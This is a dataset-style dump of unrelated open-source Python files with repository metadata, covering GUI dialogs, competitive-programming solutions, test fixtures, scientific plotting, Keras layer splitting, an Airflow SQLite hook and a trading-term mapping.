return self.component('dirname').get()
def dirvalidate(self,string):
if os.path.isdir(string):
return Pmw.OK
elif os.path.exists(string):
return Pmw.PARTIAL
else:
return Pmw.OK
def validate(self,filename):
"""Validation function. Should return 1 if the filename is valid,
0 if invalid. May pop up dialogs to tell user why. Especially
suited to subclasses: i.e. only return 1 if the file does/doesn't
exist"""
if filename=='':
_errorpop(self.interior(),"Empty filename")
return 0
if os.path.isdir(filename) or not os.path.exists(filename):
return 1
else:
_errorpop(self.interior(),"This is not a directory")
return 0
class PmwExistingFileDialog(PmwFileDialog):
def filevalidate(self,string):
if os.path.isfile(string):
return Pmw.OK
else:
return Pmw.PARTIAL
def validate(self,filename):
if os.path.isfile(filename):
return 1
elif os.path.exists(filename):
_errorpop(self.interior(),"This is not a plain file")
return 0
else:
_errorpop(self.interior(),"Please select an existing file")
return 0
class PmwExistingDirDialog(PmwDirDialog):
def dirvalidate(self,string):
if os.path.isdir(string):
return Pmw.OK
else:
return Pmw.PARTIAL
def validate(self,filename):
if os.path.isdir(filename):
return 1
elif os.path.exists(filename):
_errorpop(self.interior(),"This is not a directory")
return 0
else:
_errorpop(self.interior(),"Please select an existing directory")
if __name__=="__main__":
root=Tkinter.Tk()
root.withdraw()
Pmw.initialise()
f0=PmwFileDialog(root)
f0.title('File name dialog')
n=f0.askfilename()
print '\nFilename : ',repr(n),'\n'
f1=PmwDirDialog(root,info='This is a directory dialog')
f1.title('Directory name dialog')
while 1:
n=f1.askfilename()
if n is None:
break
print "Dirname : ",repr(n)
| [
"[email protected]"
] | |
efa55d788ff68fe0cf919b7a45220e24baccb822 | 2f98aa7e5bfc2fc5ef25e4d5cfa1d7802e3a7fae | /python/python_25489.py | 0e0cbd91234b9936d47833c2c46fd67b71ab0056 | [] | no_license | AK-1121/code_extraction | cc812b6832b112e3ffcc2bb7eb4237fd85c88c01 | 5297a4a3aab3bb37efa24a89636935da04a1f8b6 | refs/heads/master | 2020-05-23T08:04:11.789141 | 2015-10-22T19:19:40 | 2015-10-22T19:19:40 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 33 | py | # y = 3 (#This is not a comment)
| [
"[email protected]"
] | |
b9c35bacbba1122e7bf5ad1531e085007384e51a | f023692f73992354a0b7823d9c49ae730c95ab52 | /AtCoderRegularContest/132/C.py | 3e94b88d37560e4a0f7c839099cf78a2907fed1a | [] | no_license | corutopi/AtCorder_python | a959e733f9a3549fab7162023e414ac2c99c4abe | a2c78cc647076071549e354c398155a65d5e331a | refs/heads/master | 2023-08-31T09:40:35.929155 | 2023-08-20T06:19:35 | 2023-08-20T06:19:35 | 197,030,129 | 1 | 0 | null | 2022-06-22T04:06:28 | 2019-07-15T15:57:34 | Python | UTF-8 | Python | false | false | 1,979 | py | """
解説AC
変則dp
"""
# import sys
# sys.setrecursionlimit(10 ** 6)
# # for pypy
# import pypyjit
# pypyjit.set_param('max_unroll_recursion=-1')
# import bisect
# from collections import deque
# import string
from math import ceil, floor
inf = float('inf')
mod = 10 ** 9 + 7
mod2 = 998244353
# from decorator import stop_watch
#
#
# @stop_watch
def solve(N, D, A):
A = [i for i in range(D)] + [a + D - 1 if a != -1 else a for a in A] + \
[N + D + i for i in range(D)]
used = [0] * len(A)
for a in A:
used[a] = 1 if a != -1 else used[a]
dp = [0] * 2 ** (2 * D + 1)
dp[(1 << (D + 1)) - 1] = 1
for i in range(D, N + D):
dp_new = [0] * 2 ** (2 * D + 1)
for j in range(2 ** (2 * D + 1)):
# i - D - 1 が使用されていないケースはスキップ
# ここで枝刈りしておかないとpythonだと間に合わない
if not j & 1: continue
if A[i] != -1:
# 数字が固定されている場合
if not (j >> (A[i] - i + D + 1) & 1):
tmp = j >> 1 | 1 << (A[i] - i + D)
dp_new[tmp] += dp[j]
dp_new[tmp] %= mod2
else:
# 固定されていない(-1)の場合
for k in range(2 * D + 1):
if used[i + k - D]: continue # 使用済みの数字は使えない
if not (j >> (k + 1)) & 1:
tmp = j >> 1 | 1 << k
dp_new[tmp] += dp[j]
dp_new[tmp] %= mod2
dp = dp_new
print(sum(dp))
if __name__ == '__main__':
# S = input()
# N = int(input())
N, D = map(int, input().split())
A = [int(i) for i in input().split()]
solve(N, D, A)
# # test
# from random import randint
# import string
# import tool.testcase as tt
# from tool.testcase import random_str, random_ints
# solve()
| [
"[email protected]"
] | |
069869c1802fa40cf5d5a5437907958a0bfa9e2d | ad13583673551857615498b9605d9dcab63bb2c3 | /output/instances/nistData/list/nonNegativeInteger/Schema+Instance/NISTXML-SV-IV-list-nonNegativeInteger-enumeration-3-1.py | 0a96f1ef465b374d9e5d0791ff5bc20220dcdd83 | [
"MIT"
] | permissive | tefra/xsdata-w3c-tests | 397180205a735b06170aa188f1f39451d2089815 | 081d0908382a0e0b29c8ee9caca6f1c0e36dd6db | refs/heads/main | 2023-08-03T04:25:37.841917 | 2023-07-29T17:10:13 | 2023-07-30T12:11:13 | 239,622,251 | 2 | 0 | MIT | 2023-07-25T14:19:04 | 2020-02-10T21:59:47 | Python | UTF-8 | Python | false | false | 695 | py | from output.models.nist_data.list_pkg.non_negative_integer.schema_instance.nistschema_sv_iv_list_non_negative_integer_enumeration_3_xsd.nistschema_sv_iv_list_non_negative_integer_enumeration_3 import NistschemaSvIvListNonNegativeIntegerEnumeration3
from output.models.nist_data.list_pkg.non_negative_integer.schema_instance.nistschema_sv_iv_list_non_negative_integer_enumeration_3_xsd.nistschema_sv_iv_list_non_negative_integer_enumeration_3 import NistschemaSvIvListNonNegativeIntegerEnumeration3Type
obj = NistschemaSvIvListNonNegativeIntegerEnumeration3(
value=NistschemaSvIvListNonNegativeIntegerEnumeration3Type.VALUE_693_7324_20_7475_4947489_80584759_9768357488_66469880_746558290
)
| [
"[email protected]"
] | |
a99e5fd938668998f40d71595197fe4eabfea880 | 7cd36fa026bb922e438905819e97d7ed208dc49e | /examples/advanced/thinplate_morphing.py | d0515987197e12cfdcdd0e91e7e65d6ca9ab8b07 | [
"MIT"
] | permissive | lxychuanhai/vtkplotter | b267bfcbbee5c7733ac98f5327e311c9529c74b1 | bc1b8b8821095263a46bba20ca345cab1d70cc42 | refs/heads/master | 2020-11-25T15:25:33.597049 | 2019-12-17T18:49:05 | 2019-12-17T18:49:05 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 808 | py | """
Warp the tip of a mesh using Thin Plate Splines.
Red points stay fixed while a single point in space
moves as the arrow shows.
"""
from vtkplotter import *
mesh = load(datadir+"man.vtk").normalize()
meshd = mesh.clone().decimate(N=100) # a heavily decimated copy
sources = [[0.0, 1.0, 0.2]] # this point moves
targets = [[0.3, 1.3, 0.4]] # to this.
for pt in meshd.getPoints():
if pt[1] < 0.3: # these pts don't move
sources.append(pt) # source = target
targets.append(pt)
# calculate the warping T on the reduced mesh
T = thinPlateSpline(meshd, sources, targets).getTransform()
warp = mesh.clone().transformMesh(T).c("blue").alpha(0.4)
apts = Points(sources).c("red")
arro = Arrow(sources[0], targets[0])
show(mesh, arro, warp, apts, Text(__doc__), viewup="z", axes=1)
| [
"[email protected]"
] | |
1d94a7aaf0160f003ff3934bba18e8f21ae50052 | 69a576aa60918b3b846963da2238931468e354ab | /utils/spatial.py | 48c11f134472aad99921594a9b5bfddc25d536b5 | [] | no_license | parallel-ml/stand-alone | 3d04a31d442bf422d67d2f0a1f03eb04bdb841c7 | c86ce0d632188e9e16fb5539a7e2baed2c40ecdb | refs/heads/master | 2020-03-29T10:49:48.426742 | 2018-11-20T16:40:35 | 2018-11-20T16:40:35 | 149,824,728 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,044 | py | """
This module implements single Conv2D layer spatial split.
It provides an example of 2 division and another generalized
example. The arithmetic technique is discussed in 2 division
example.
"""
from keras.layers import Conv2D, Lambda, ZeroPadding2D
from keras.layers.merge import Concatenate
import keras.backend as K
import math
def split_xy(X, kernal, strides, padding, num):
""" A general function for split tensors with different shapes. """
# take care of padding here and set padding of conv always to be valid
if padding == 'same':
wk, hk = kernal
ws, hs = strides
_, W, H, _ = K.int_shape(X)
ow, oh = W / ws, H / hs
if W % ws != 0:
ow += 1
if H % hs != 0:
oh += 1
wp, hp = (ow - 1) * ws + wk - W, (oh - 1) * hs + hk - H
wp, hp = wp if wp >= 0 else 0, hp if hp >= 0 else 0
X = ZeroPadding2D(padding=((hp / 2, hp - hp / 2), (wp / 2, wp - wp / 2)))(X)
wk, hk = kernal
ws, hs = strides
_, W, H, _ = K.int_shape(X)
# output size
ow, oh = (W - wk) / ws + 1, (H - hk) / hs + 1
# calculate boundary for general chunk
wchunk, hchunk = ow / num, oh / num
rw, rh = (wchunk - 1) * ws + wk, (hchunk - 1) * hs + hk
# calculate special boundary for last chunk
wlchunk, hlchunk = ow - (num - 1) * wchunk, oh - (num - 1) * hchunk
lrw, lrh = (wlchunk - 1) * ws + wk, (hlchunk - 1) * hs + hk
offset = lambda kernals, strides, i: (kernals - strides) * i if kernals - strides > 0 else 0
# create a list of tuple with boundary (left, right, up, down)
boundary = []
for r in range(num):
for c in range(num):
if r == num - 1 and c == num - 1:
boundary.append((W - lrw, W, H - lrh, H))
elif r == num - 1:
boundary.append((rw * c - offset(wk, ws, c), rw * c - offset(wk, ws, c) + rw, H - lrh, H))
elif c == num - 1:
boundary.append((W - lrw, W, rh * r - offset(hk, hs, r), rh * r - offset(hk, hs, r) + rh))
else:
boundary.append(
(
rw * c - offset(wk, ws, c),
rw * c - offset(wk, ws, c) + rw,
rh * r - offset(hk, hs, r),
rh * r - offset(hk, hs, r) + rh,
)
)
return Lambda(
lambda x:
[x[:, lb:rb, ub:db, :] for lb, rb, ub, db in boundary]
)(X)
def merge(tensors):
"""
The merge function will concatenate all inputs vertically and
then horizontally.
"""
size = int(math.sqrt(len(tensors)))
rows = [Concatenate(axis=1)(tensors[k * size:k * size + size]) for k in range(size)]
return Concatenate(axis=2)(rows)
def conv(tensors, filters, kernal, strides, padding, activation, name):
layer = Conv2D(filters, kernal, strides=strides, padding=padding, activation=activation, name=name + '_conv')
return [layer(x) for x in tensors] | [
"[email protected]"
] | |
4fd1a36063610493d16705b91faca3442fdc810a | 480e33f95eec2e471c563d4c0661784c92396368 | /Geometry/HGCalCommonData/test/python/dumpTBGeometryDDD_cfg.py | 998122a85ad6a346ff919cce319dcc301f314db8 | [
"Apache-2.0"
] | permissive | cms-nanoAOD/cmssw | 4d836e5b76ae5075c232de5e062d286e2026e8bd | 4eccb8a758b605875003124dd55ea58552b86af1 | refs/heads/master-cmsswmaster | 2021-01-23T21:19:52.295420 | 2020-08-27T08:01:20 | 2020-08-27T08:01:20 | 102,867,729 | 7 | 14 | Apache-2.0 | 2022-05-23T07:58:09 | 2017-09-08T14:03:57 | C++ | UTF-8 | Python | false | false | 821 | py | import FWCore.ParameterSet.Config as cms
process = cms.Process("DUMP")
process.load("Geometry.HGCalCommonData.testTB181XML_cfi")
process.load('FWCore.MessageService.MessageLogger_cfi')
if 'MessageLogger' in process.__dict__:
process.MessageLogger.categories.append('G4cerr')
process.MessageLogger.categories.append('G4cout')
process.MessageLogger.categories.append('HGCalGeom')
process.source = cms.Source("EmptySource")
process.maxEvents = cms.untracked.PSet(
input = cms.untracked.int32(1)
)
process.add_(cms.ESProducer("TGeoMgrFromDdd",
verbose = cms.untracked.bool(False),
level = cms.untracked.int32(14)
))
process.dump = cms.EDAnalyzer("DumpSimGeometry",
outputFileName = cms.untracked.string('TBGeom.root'))
process.p = cms.Path(process.dump)
| [
"[email protected]"
] | |
37483fd1e0d9006657489d14e97b898faed7670f | 45de7d905486934629730945619f49281ad19359 | /xlsxwriter/test/worksheet/test_cond_format22.py | 4c5f28418e89a70c30d923a17b0cf44b9f5c802f | [
"BSD-2-Clause"
] | permissive | jmcnamara/XlsxWriter | 599e1d225d698120ef931a776a9d93a6f60186ed | ab13807a1be68652ffc512ae6f5791d113b94ee1 | refs/heads/main | 2023-09-04T04:21:04.559742 | 2023-08-31T19:30:52 | 2023-08-31T19:30:52 | 7,433,211 | 3,251 | 712 | BSD-2-Clause | 2023-08-28T18:52:14 | 2013-01-04T01:07:06 | Python | UTF-8 | Python | false | false | 8,726 | py | ###############################################################################
#
# Tests for XlsxWriter.
#
# SPDX-License-Identifier: BSD-2-Clause
# Copyright (c), 2013-2023, John McNamara, [email protected]
#
import unittest
from io import StringIO
from ..helperfunctions import _xml_to_list
from ...worksheet import Worksheet
class TestAssembleWorksheet(unittest.TestCase):
"""
Test assembling a complete Worksheet file.
"""
def test_assemble_xml_file(self):
"""Test writing a worksheet with conditional formatting."""
self.maxDiff = None
fh = StringIO()
worksheet = Worksheet()
worksheet._set_filehandle(fh)
worksheet.select()
worksheet.write("A1", 1)
worksheet.write("A2", 2)
worksheet.write("A3", 3)
worksheet.write("A4", 4)
worksheet.write("A5", 5)
worksheet.write("A6", 6)
worksheet.write("A7", 7)
worksheet.write("A8", 8)
worksheet.write("A9", 9)
worksheet.conditional_format(
"A1", {"type": "icon_set", "icon_style": "3_arrows"}
)
worksheet.conditional_format(
"A2", {"type": "icon_set", "icon_style": "3_flags"}
)
worksheet.conditional_format(
"A3", {"type": "icon_set", "icon_style": "3_traffic_lights_rimmed"}
)
worksheet.conditional_format(
"A4", {"type": "icon_set", "icon_style": "3_symbols_circled"}
)
worksheet.conditional_format(
"A5", {"type": "icon_set", "icon_style": "4_arrows"}
)
worksheet.conditional_format(
"A6", {"type": "icon_set", "icon_style": "4_red_to_black"}
)
worksheet.conditional_format(
"A7", {"type": "icon_set", "icon_style": "4_traffic_lights"}
)
worksheet.conditional_format(
"A8", {"type": "icon_set", "icon_style": "5_arrows_gray"}
)
worksheet.conditional_format(
"A9", {"type": "icon_set", "icon_style": "5_quarters"}
)
worksheet._assemble_xml_file()
exp = _xml_to_list(
"""
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<worksheet xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships">
<dimension ref="A1:A9"/>
<sheetViews>
<sheetView tabSelected="1" workbookViewId="0"/>
</sheetViews>
<sheetFormatPr defaultRowHeight="15"/>
<sheetData>
<row r="1" spans="1:1">
<c r="A1">
<v>1</v>
</c>
</row>
<row r="2" spans="1:1">
<c r="A2">
<v>2</v>
</c>
</row>
<row r="3" spans="1:1">
<c r="A3">
<v>3</v>
</c>
</row>
<row r="4" spans="1:1">
<c r="A4">
<v>4</v>
</c>
</row>
<row r="5" spans="1:1">
<c r="A5">
<v>5</v>
</c>
</row>
<row r="6" spans="1:1">
<c r="A6">
<v>6</v>
</c>
</row>
<row r="7" spans="1:1">
<c r="A7">
<v>7</v>
</c>
</row>
<row r="8" spans="1:1">
<c r="A8">
<v>8</v>
</c>
</row>
<row r="9" spans="1:1">
<c r="A9">
<v>9</v>
</c>
</row>
</sheetData>
<conditionalFormatting sqref="A1">
<cfRule type="iconSet" priority="1">
<iconSet iconSet="3Arrows">
<cfvo type="percent" val="0"/>
<cfvo type="percent" val="33"/>
<cfvo type="percent" val="67"/>
</iconSet>
</cfRule>
</conditionalFormatting>
<conditionalFormatting sqref="A2">
<cfRule type="iconSet" priority="2">
<iconSet iconSet="3Flags">
<cfvo type="percent" val="0"/>
<cfvo type="percent" val="33"/>
<cfvo type="percent" val="67"/>
</iconSet>
</cfRule>
</conditionalFormatting>
<conditionalFormatting sqref="A3">
<cfRule type="iconSet" priority="3">
<iconSet iconSet="3TrafficLights2">
<cfvo type="percent" val="0"/>
<cfvo type="percent" val="33"/>
<cfvo type="percent" val="67"/>
</iconSet>
</cfRule>
</conditionalFormatting>
<conditionalFormatting sqref="A4">
<cfRule type="iconSet" priority="4">
<iconSet iconSet="3Symbols">
<cfvo type="percent" val="0"/>
<cfvo type="percent" val="33"/>
<cfvo type="percent" val="67"/>
</iconSet>
</cfRule>
</conditionalFormatting>
<conditionalFormatting sqref="A5">
<cfRule type="iconSet" priority="5">
<iconSet iconSet="4Arrows">
<cfvo type="percent" val="0"/>
<cfvo type="percent" val="25"/>
<cfvo type="percent" val="50"/>
<cfvo type="percent" val="75"/>
</iconSet>
</cfRule>
</conditionalFormatting>
<conditionalFormatting sqref="A6">
<cfRule type="iconSet" priority="6">
<iconSet iconSet="4RedToBlack">
<cfvo type="percent" val="0"/>
<cfvo type="percent" val="25"/>
<cfvo type="percent" val="50"/>
<cfvo type="percent" val="75"/>
</iconSet>
</cfRule>
</conditionalFormatting>
<conditionalFormatting sqref="A7">
<cfRule type="iconSet" priority="7">
<iconSet iconSet="4TrafficLights">
<cfvo type="percent" val="0"/>
<cfvo type="percent" val="25"/>
<cfvo type="percent" val="50"/>
<cfvo type="percent" val="75"/>
</iconSet>
</cfRule>
</conditionalFormatting>
<conditionalFormatting sqref="A8">
<cfRule type="iconSet" priority="8">
<iconSet iconSet="5ArrowsGray">
<cfvo type="percent" val="0"/>
<cfvo type="percent" val="20"/>
<cfvo type="percent" val="40"/>
<cfvo type="percent" val="60"/>
<cfvo type="percent" val="80"/>
</iconSet>
</cfRule>
</conditionalFormatting>
<conditionalFormatting sqref="A9">
<cfRule type="iconSet" priority="9">
<iconSet iconSet="5Quarters">
<cfvo type="percent" val="0"/>
<cfvo type="percent" val="20"/>
<cfvo type="percent" val="40"/>
<cfvo type="percent" val="60"/>
<cfvo type="percent" val="80"/>
</iconSet>
</cfRule>
</conditionalFormatting>
<pageMargins left="0.7" right="0.7" top="0.75" bottom="0.75" header="0.3" footer="0.3"/>
</worksheet>
"""
)
got = _xml_to_list(fh.getvalue())
self.assertEqual(got, exp)
| [
"[email protected]"
] | |
bce38b1477870007035b59a1dc2f07b2775b04fa | 487ce91881032c1de16e35ed8bc187d6034205f7 | /codes/CodeJamCrawler/16_0_3/Himanshu.Mishra/problem.py | abd5a6a5b627365883042f53a6cc564bc5e737e7 | [] | no_license | DaHuO/Supergraph | 9cd26d8c5a081803015d93cf5f2674009e92ef7e | c88059dc66297af577ad2b8afa4e0ac0ad622915 | refs/heads/master | 2021-06-14T16:07:52.405091 | 2016-08-21T13:39:13 | 2016-08-21T13:39:13 | 49,829,508 | 2 | 0 | null | 2021-03-19T21:55:46 | 2016-01-17T18:23:00 | Python | UTF-8 | Python | false | false | 1,389 | py | def isprime(n):
if n == 2:
return True
if not n & 1:
return False
return pow(2, n-1, n) == 1
# def isprime(n):
# """Returns True if n is prime."""
# if n == 2:
# return True
# if n == 3:
# return True
# if n % 2 == 0:
# return False
# if n % 3 == 0:
# return False
# i = 5
# w = 2
# while i * i <= n:
# if n % i == 0:
# return False
# i += w
# w = 6 - w
# return True
def isDivisibleBy(num):
for i in range(2, num):
if num%i==0:
return i
def main():
data = []
print("Case #1:")
for i in range(35):
num = 2**i
# print(num, len(bin(num)[2:]), bin(num+1)[2:], bin(int(num*2-1))[2:])
data.append([num+1, int(num*2-1)])
N = 32
count = 0
startingNumber = data[N-1][0]
finalNumber = data[N-1][1]
for i in range(startingNumber, finalNumber+1, 2):
numstr = bin(i)[2:]
base = [int(numstr, 2), int(numstr, 3), int(numstr, 4), int(numstr, 5), int(numstr, 6), int(numstr, 7), int(numstr, 8), int(numstr, 9), int(numstr, 10)]
# print(base)
flag = 0
for j in base:
if not isprime(j):
flag = 1
else:
flag = 0
break
if flag == 1:
if count >= 700:
break
else:
count = count + 1
answer = str(base[10-2])
for k in base:
answer += " " + str(isDivisibleBy(k))
print(answer)
if __name__ == '__main__':
main() | [
"[[email protected]]"
] | |
59aec718fce53f6051be2ea2d5f6ec1380b3bfd2 | c7027edceeae907ce7d21112336e84f101eeb89b | /airflow/providers/sqlite/hooks/sqlite.py | 5a14249ca5902174edf5d6b29c533545cbd950d7 | [
"Apache-2.0",
"BSD-3-Clause",
"MIT"
] | permissive | jao6693/airflow | 0a8027ce33e20ee8f6032facb1b8ab453c2d20d4 | 269b608246b015c55e6cae4ed0f50b1e2bb0fa95 | refs/heads/main | 2023-01-30T18:53:23.431745 | 2022-11-05T14:59:27 | 2022-11-05T14:59:27 | 320,338,180 | 0 | 0 | Apache-2.0 | 2020-12-10T17:08:36 | 2020-12-10T17:08:35 | null | UTF-8 | Python | false | false | 1,618 | py | #
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
import sqlite3
from airflow.providers.common.sql.hooks.sql import DbApiHook
class SqliteHook(DbApiHook):
"""Interact with SQLite."""
conn_name_attr = 'sqlite_conn_id'
default_conn_name = 'sqlite_default'
conn_type = 'sqlite'
hook_name = 'Sqlite'
placeholder = '?'
def get_conn(self) -> sqlite3.dbapi2.Connection:
"""Returns a sqlite connection object"""
conn_id = getattr(self, self.conn_name_attr)
airflow_conn = self.get_connection(conn_id)
conn = sqlite3.connect(airflow_conn.host)
return conn
def get_uri(self) -> str:
"""Override DbApiHook get_uri method for get_sqlalchemy_engine()"""
conn_id = getattr(self, self.conn_name_attr)
airflow_conn = self.get_connection(conn_id)
return f"sqlite:///{airflow_conn.host}"
| [
"[email protected]"
] | |
c643c289d6a7b2f99414e9f9a7bb4a558e5ac8c3 | d79f3a31d173f18ec112c521acdcee8e8e73724d | /test5.py | 7cd08b85a12191df9c24b5d26bcedcd5412f72de | [] | no_license | k156/hello | 3de815de569b38f8260e774e57b138f4da43f480 | f5a7f386d3f78d15d7f166a95ad25724e168f472 | refs/heads/master | 2020-04-04T23:15:38.252126 | 2019-05-03T05:57:00 | 2019-05-03T05:57:00 | 156,352,395 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 589 | py | from bs4 import BeautifulSoup
import requests
from time import sleep
headers = {
"User-Agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36"
}
url = "https://www.melon.com/chart/index.htm#params%5Bidx%5D=1/"
html = requests.get(url, headers = headers).text
soup = BeautifulSoup(html, 'html.parser')
trs = soup.select("tr#lst50")
for tr in trs:
tds = tr.select('td')
rank = tds[1].text
title = tds[4]
# singer =
# print(rank, title, type(title))
print(rank, title, type(title)) | [
"[email protected]"
] | |
48ee6be5fa369aab7a24d7f1be33ef53dfa886a5 | e452f89c51180487f2ed68c33ca2fed54e14a967 | /1-Python-Programming-Basics (Sep 2020)/Course-Exercises-and-Exams/02_Conditional-Statements/01.Lab-01-Excellent-Result.py | 4d9450ac08bdcaf06642e2351b5898ce2cc0b984 | [
"MIT"
] | permissive | karolinanikolova/SoftUni-Software-Engineering | c996f18eea9fb93164ab674614e90b357ef4858a | 7891924956598b11a1e30e2c220457c85c40f064 | refs/heads/main | 2023-06-21T23:24:55.224528 | 2021-07-22T16:15:59 | 2021-07-22T16:15:59 | 367,432,464 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 436 | py | # 1. Проверка за отлична оценка
# Първата задача от тази тема е да се напише конзолна програма, която чете оценка (реално число),
# въведена от потребителя и отпечатва "Excellent!", ако оценката е 5.50 или по-висока.
grade = float(input())
if grade >= 5.50:
print("Excellent!") | [
"[email protected]"
] | |
b9e01fd5c696231a6b883b2817e73b84b476dbaa | 1646b3fe9000c3109695e99b4bb75679577906ff | /236.LowestCommonAncestorOfABinaryTree.py | 78bdf6a542e4686bb190fc7b9d792fdb40e9fbeb | [] | no_license | yao9208/lc | 5ecf6720886beb951c9a70433f53a0ec0bcb74dc | 024c1b5c98a9e85706e110fc2be8dcebf0f460c3 | refs/heads/master | 2020-04-03T20:55:40.199637 | 2017-02-10T08:30:46 | 2017-02-10T08:30:46 | 56,478,941 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 554 | py | class Solution(object):
def lowestCommonAncestor(self, root, p, q):
"""
:type root: TreeNode
:type p: TreeNode
:type q: TreeNode
:rtype: TreeNode
"""
if not root:
return root
if root==p or root==q:
return root
left = self.lowestCommonAncestor(root.left, p, q)
right = self.lowestCommonAncestor(root.right, p, q)
if left:
if right:
return root
else:
return left
return right
| [
"[email protected]"
] | |
1f2424d5b24baaab7fe1c1ce30f92fcfc2ec1dd1 | 7ea5517353f325fc0bcc0e552233b103335bc9ec | /QUANTAXIS/QAMarket/common.py | 143b325f56b9ba86e312c9a8f7bbeee7f3dbd0fd | [
"MIT"
] | permissive | lxqjswa/QUANTAXIS | 304f20c3ba957d51664a8736faca6a777a658583 | a5f89b28a75d1a5094630a4ed166f596840528b1 | refs/heads/master | 2020-03-28T08:45:47.064394 | 2018-09-08T07:15:26 | 2018-09-08T07:15:26 | 147,987,895 | 1 | 0 | MIT | 2018-09-09T02:52:34 | 2018-09-09T02:52:34 | null | UTF-8 | Python | false | false | 5,031 | py |
# shipane
# "申报时间", "证券代码", "证券名称", "操作", "委托状态", "委托数量", "成交数量", "撤消数量", , "委托价格", "成交均价", "合同编号", "委托子业务", "约定号", "对方账户", "参考汇率", "结算币种", "交易币种", "证券中文名", "出错信息
from QUANTAXIS.QAUtil.QAParameter import ORDER_DIRECTION, TRADE_STATUS, ORDER_STATUS
cn_en_compare = {'明细': 'id',
'证券代码': 'code',
'市场代码': 'market_code',
'证券名称': 'name',
'股票余额': 'amount',
'可用余额': 'sell_available',
'冻结数量': 'frozen',
'买卖标志': 'towards',
'撤消数量': 'cancel_amount',
'撤单数量': 'cancel_amount',
'订单类型': 'order_type',
'操作': 'towards', # 这个是模拟交易的买卖标志
'委托价格': 'order_price',
'委托数量': 'order_amount',
'成交价格': 'trade_price',
'成交数量': 'trade_amount',
'状态说明': 'status',
'备注': 'status', # 这个是模拟交易的status
'场外撤单': 'cancel_outside',
'场内撤单': 'cancel_inside',
'未成交': 'pending',
'全部撤单': 'cancel_all',
'委托时间': 'order_time',
'合同编号': 'realorder_id', # 模拟交易的委托编号
'撤销数量': 'cancel_amount',
'委托编号': 'realorder_id',
'批次号': 'pc_id',
'盈亏': 'pnl',
"": 'None',
'成本金额': 'cost',
'盈亏估算': 'pnl_prob',
'成本价': 'hold_price',
'实现盈亏': 'pnl_money_already',
'盈亏比例(%)': 'pnl_ratio',
'市价': 'price',
'市值': 'market_value',
'交易市场': 'SSE',
'股东帐户': 'shareholders',
'实际数量': 'total_amount',
'可申赎数量': 'redemption_number',
'资讯': 'message',
'汇率': 'exchange_rate',
'沪港深港市场': 'hkmarket',
'成本价港币': 'hold_price_hk',
'买入成本价港币': 'buy_price_hk',
'买入在途数量': 'buy_onway',
'卖出在途数量': 'sell_onway',
'场内废单': 'failled',
'场外撤单': 'cancel_outside',
'场内撤单': 'cancel_inside',
'未成交': 'pending',
'已成交': 'finished',
'全部撤单': 'cancel_all',
'成交均价': 'trade_price', # 成交价
'成交金额': 'trade_money',
'成交编号': 'trade_id',
'委托状态': 'status',
'申报时间': 'order_time',
'委托日期': 'order_date',
'委托子业务': 'order_subjob',
'约定号': 'yd_id',
'对方账户': 'other_account',
'参考汇率': 'refer_exchange',
'结算币种': 'settlement_currency',
'交易币种': 'trade_currency',
'证券中文名': 'CNname',
'出错信息': 'error',
'成交时间': 'trade_time'}
trade_towards_cn_en = {
'买入': ORDER_DIRECTION.BUY,
'买': ORDER_DIRECTION.BUY,
'卖出': ORDER_DIRECTION.SELL,
'卖': ORDER_DIRECTION.SELL,
'申购': ORDER_DIRECTION.ASK,
'申': ORDER_DIRECTION.ASK,
'证券买入': ORDER_DIRECTION.BUY,
'证券卖出': ORDER_DIRECTION.SELL,
'派息': ORDER_DIRECTION.XDXR,
'': ORDER_DIRECTION.OTHER
}
order_status_cn_en = {
'已报': ORDER_STATUS.QUEUED, # 委托已经被交易端接受了
'未成交': ORDER_STATUS.QUEUED,
'已确认': ORDER_STATUS.QUEUED, # 新股申购已经被交易端接受
'场内废单': ORDER_STATUS.FAILED,
'废单': ORDER_STATUS.FAILED, # 委托不符合交易规则,被交易端拒绝了
'未报': ORDER_STATUS.FAILED, # 委托还没有被交易端接受
'场外废单': ORDER_STATUS.FAILED,
'已成交': ORDER_STATUS.SUCCESS_ALL,
'已成': ORDER_STATUS.SUCCESS_ALL,
'全部成交': ORDER_STATUS.SUCCESS_ALL,
'部成': ORDER_STATUS.SUCCESS_PART, # 委托已经成交了一部份
'已撤单': ORDER_STATUS.CANCEL_ALL,
'全部撤单': ORDER_STATUS.CANCEL_ALL,
'已撤': ORDER_STATUS.CANCEL_ALL,
'已报待撤': ORDER_STATUS.QUEUED, # 已经申报了撤单,交易端也已接受,但目前可能因为还没在交易时间段,所以还在等待撤消
'场内撤单': ORDER_STATUS.CANCEL_ALL,
}
| [
"[email protected]"
] | |
e53c50114defbb9001385514940c7f56071976fb | 20c20938e201a0834ccf8b5f2eb5d570d407ad15 | /abc032/abc032_b/8108449.py | b7cc2e87327a45202a747c78434008246dab432c | [] | no_license | kouhei-k/atcoder_submissions | 8e1a1fb30c38e0d443b585a27c6d134bf1af610a | 584b4fd842ccfabb16200998fe6652f018edbfc5 | refs/heads/master | 2021-07-02T21:20:05.379886 | 2021-03-01T12:52:26 | 2021-03-01T12:52:26 | 227,364,764 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 159 | py | S=input()
k=int(input())
import collections
table=collections.defaultdict(int)
for i in range(len(S)-k+1):
table[S[i:k+i]]+=1
print(len(list(table.keys())))
| [
"[email protected]"
] | |
